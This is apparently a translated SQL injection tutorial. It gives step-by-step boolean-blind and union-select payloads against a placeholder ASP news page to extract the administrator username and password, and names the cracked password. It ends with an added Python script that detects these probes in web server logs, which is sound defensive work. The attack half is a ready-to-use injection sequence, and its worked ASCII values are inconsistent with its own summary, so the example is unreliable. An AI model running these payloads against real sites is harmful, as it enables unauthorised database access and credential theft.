Injection point: http://www.xxx.com/news.asp?id=6

To determine whether the parameter is injectable, send the two requests below; if the two responses differ, an injection exists:
http://www.xxx.com/news.asp?id=6 and 1=1
http://www.xxx.com/news.asp?id=6 and 1=2

Determine the database type (this check may not work because of local issues):
and (select count(*) from msysobjects)>0    (Access: the page returns an insufficient-permissions error)
and (select count(*) from sysobjects)>0     (MSSQL: the page returns normally)
Guess the table name (a normal response means the table exists, an error means it does not):
and exists(select * from admin)
If the page returns normally, the admin table exists and we can go on; if it returns an error, the table does not exist.

Now guess the fields:
and exists(select username from admin)
and exists(select password from admin)
If neither request returns an error, both fields exist.
Guess the username and password length:
and (select top 1 len(username) from admin)>0
and (select top 1 len(password) from admin)>0

Guess the username and password content (asc(mid(username,n,1)) is the ASCII code of the n-th character):
and (select top 1 asc(mid(username,1,1)) from admin)>97
and (select top 1 asc(mid(username,1,1)) from admin)=97
and (select top 1 asc(mid(username,2,1)) from admin)=100
and (select top 1 asc(mid(username,3,1)) from admin)=109
and (select top 1 asc(mid(username,4,1)) from admin)=105
and (select top 1 asc(mid(username,5,1)) from admin)=110
97 100 109 105 110 = admin
------------------------------------------------------
and (select top 1 asc(mid(password,1,1)) from admin)=52
and (select top 1 asc(mid(password,2,1)) from admin)=54
and (select top 1 asc(mid(password,3,1)) from admin)=57
and (select top 1 asc(mid(password,4,1)) from admin)=56
and (select top 1 asc(mid(password,5,1)) from admin)=48
and (select top 1 asc(mid(password,6,1)) from admin)=100
and (select top 1 asc(mid(password,7,1)) from admin)=51
and (select top 1 asc(mid(password,8,1)) from admin)=50
and (select top 1 asc(mid(password,9,1)) from admin)=99
and (select top 1 asc(mid(password,10,1)) from admin)=48
and (select top 1 asc(mid(password,11,1)) from admin)=53
and (select top 1 asc(mid(password,12,1)) from admin)=53
and (select top 1 asc(mid(password,13,1)) from admin)=57
and (select top 1 asc(mid(password,14,1)) from admin)=102
and (select top 1 asc(mid(password,15,1)) from admin)=56
and (select top 1 asc(mid(password,16,1)) from admin)=32
52 54 57 101 56 48 100 51 50 99 48 53 57 102 56 32
The result, 469e80d32c0559f8, is a 16-character MD5 hash; it cracks to the password admin888.
========================================================== ==================
(2) Union query to expose the administrator account and password

First use order by to find the number of columns, then:
http://www.xxx.com/news.asp?id=6 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 from admin
Syntax: 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 is the column list matching the number of columns found with order by; "from admin" is the table being queried.
After running this, two or three of the numbers will be displayed in the page. If, for example, 4 and 12 are displayed, replace those positions in the select list with the column names (the parts shown in red in the original):
http://www.xxx.com/news.asp?id=6 and 1=2 union select 1,2,3,username,5,6,7,8,9,10,11,password,13,14,15 from admin
This displays the administrator account and password. Of course, you can also pull the account first:
http://www.xxx.com/news.asp?id=6 and 1=2 union select 1,2,3,username,5,6,7,8,9,10,11,12,13,14,15 from admin
and then the password:
http://www.xxx.com/news.asp?id=6 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,password,13,14,15 from admin
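Both the boolean-blind procedure in (1) and the union query in (2) leave a very recognisable trail in the web server log, and a defender's first question after spotting it is "what did the attacker actually learn?". The following Python script is an added example written for this page; it is not part of the original tutorial. It parses constructed IIS-style W3C log lines (fields assumed: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status sc-bytes; the addresses, sizes and timestamps are made up), tags each request with the probe type it matches, and replays the asc(mid(...)) equality probes against the response size of the attacker's own "and 1=1" request to reconstruct the characters the attacker confirmed.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS-style W3C log lines (not real traffic). Fields:
# date time cs-method cs-uri-stem cs-uri-query c-ip sc-status sc-bytes
SAMPLE_LOG = """\
2024-01-15 10:00:01 GET /news.asp id=6 203.0.113.5 200 5120
2024-01-15 10:00:02 GET /news.asp id=6+and+1%3D1 203.0.113.5 200 5120
2024-01-15 10:00:03 GET /news.asp id=6+and+1%3D2 203.0.113.5 200 312
2024-01-15 10:00:04 GET /news.asp id=6+and+(select+count(*)+from+msysobjects)%3E0 203.0.113.5 500 1104
2024-01-15 10:00:05 GET /news.asp id=6+and+exists(select+*+from+admin) 203.0.113.5 200 5120
2024-01-15 10:00:06 GET /news.asp id=6+and+(select+top+1+len(username)+from+admin)%3E0 203.0.113.5 200 5120
2024-01-15 10:00:07 GET /news.asp id=6+and+(select+top+1+asc(mid(username,1,1))+from+admin)%3E97 203.0.113.5 200 312
2024-01-15 10:00:08 GET /news.asp id=6+and+(select+top+1+asc(mid(username,1,1))+from+admin)%3D97 203.0.113.5 200 5120
2024-01-15 10:00:09 GET /news.asp id=6+and+(select+top+1+asc(mid(username,2,1))+from+admin)%3D100 203.0.113.5 200 5120
2024-01-15 10:00:10 GET /news.asp id=6+and+(select+top+1+asc(mid(username,3,1))+from+admin)%3D109 203.0.113.5 200 5120
2024-01-15 10:00:11 GET /news.asp id=6+and+(select+top+1+asc(mid(username,4,1))+from+admin)%3D100 203.0.113.5 200 312
2024-01-15 10:00:12 GET /news.asp id=6+and+(select+top+1+asc(mid(username,4,1))+from+admin)%3D105 203.0.113.5 200 5120
2024-01-15 10:00:13 GET /news.asp id=7 198.51.100.9 200 4870
2024-01-15 10:00:14 GET /news.asp id=6+and+1%3D2+union+select+1,2,3,username,5+from+admin 203.0.113.5 200 5310
"""

# Signatures for the probe shapes shown on this page, matched against the URL-decoded query string.
SIGNATURES = {
    "boolean_probe": re.compile(r"\band\s+1\s*=\s*[12]\b", re.I),
    "db_fingerprint": re.compile(r"\bfrom\s+(msysobjects|sysobjects)\b", re.I),
    "schema_probe": re.compile(r"\bexists\s*\(\s*select\b", re.I),
    "length_probe": re.compile(r"\blen\s*\(", re.I),
    "char_probe": re.compile(r"\basc\s*\(\s*mid\s*\(", re.I),
    "union_select": re.compile(r"\bunion\s+select\b", re.I),
}

# Captures column, position, comparison operator and ASCII value of one character probe.
CHAR_PROBE = re.compile(
    r"asc\s*\(\s*mid\s*\(\s*(\w+)\s*,\s*(\d+)\s*,\s*1\s*\)\s*\)\s*from\s+\w+\s*\)\s*(=|>|<)\s*(\d+)",
    re.I,
)


def parse_line(line):
    """Split one W3C line into a record; the query string is URL-decoded so '%3D' becomes '='."""
    parts = line.split()
    if len(parts) != 8:
        return None
    date, time, method, stem, query, client, status, size = parts
    return {
        "time": f"{date} {time}", "method": method, "stem": stem,
        "query": unquote_plus(query), "client": client,
        "status": int(status), "bytes": int(size),
    }


def classify(query):
    """Return the set of probe types whose signature matches the decoded query."""
    return {name for name, rx in SIGNATURES.items() if rx.search(query)}


def scan(log_text):
    """Return every parsed record that matched at least one signature, with its tags attached."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(rec["query"])
        if tags:
            rec["tags"] = tags
            findings.append(rec)
    return findings


def summarize(findings):
    """Count probe types per client address, which is what an alert or ticket would carry."""
    by_client = {}
    for rec in findings:
        for tag in rec["tags"]:
            counts = by_client.setdefault(rec["client"], {})
            counts[tag] = counts.get(tag, 0) + 1
    return by_client


def reconstruct_extraction(findings):
    """Replay the character probes to see what the attacker confirmed.

    Boolean-blind truth lives in the page body, so the log alone cannot show it;
    this uses sc-bytes as a proxy: an '=' probe whose response is the same size
    as the client's own 'and 1=1' (true) request is treated as a confirmed character.
    Unconfirmed positions are shown as '?'.
    """
    baseline = {}
    for rec in findings:
        if "boolean_probe" in rec["tags"] and re.search(r"1\s*=\s*1", rec["query"]):
            baseline[(rec["client"], rec["stem"])] = rec["bytes"]
    recovered = {}
    for rec in findings:
        if "char_probe" not in rec["tags"]:
            continue
        m = CHAR_PROBE.search(rec["query"])
        if m is None or m.group(3) != "=":
            continue
        if rec["bytes"] != baseline.get((rec["client"], rec["stem"])):
            continue
        column, pos, code = m.group(1).lower(), int(m.group(2)), int(m.group(4))
        recovered.setdefault(column, {})[pos] = chr(code)
    return {
        col: "".join(chars.get(i, "?") for i in range(1, max(chars) + 1))
        for col, chars in recovered.items()
    }


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    print(summarize(found))
    print("confirmed by attacker:", reconstruct_extraction(found))
```

On the constructed sample this reports one client issuing boolean, fingerprint, schema, length, character and union probes, and the replay shows that the attacker had confirmed the first four characters of username (admi) by the end of the log. The size-based baseline is a heuristic: dynamic pages whose length varies between requests will produce misses or false confirmations, so treat the reconstruction as a starting point for reviewing the responses themselves.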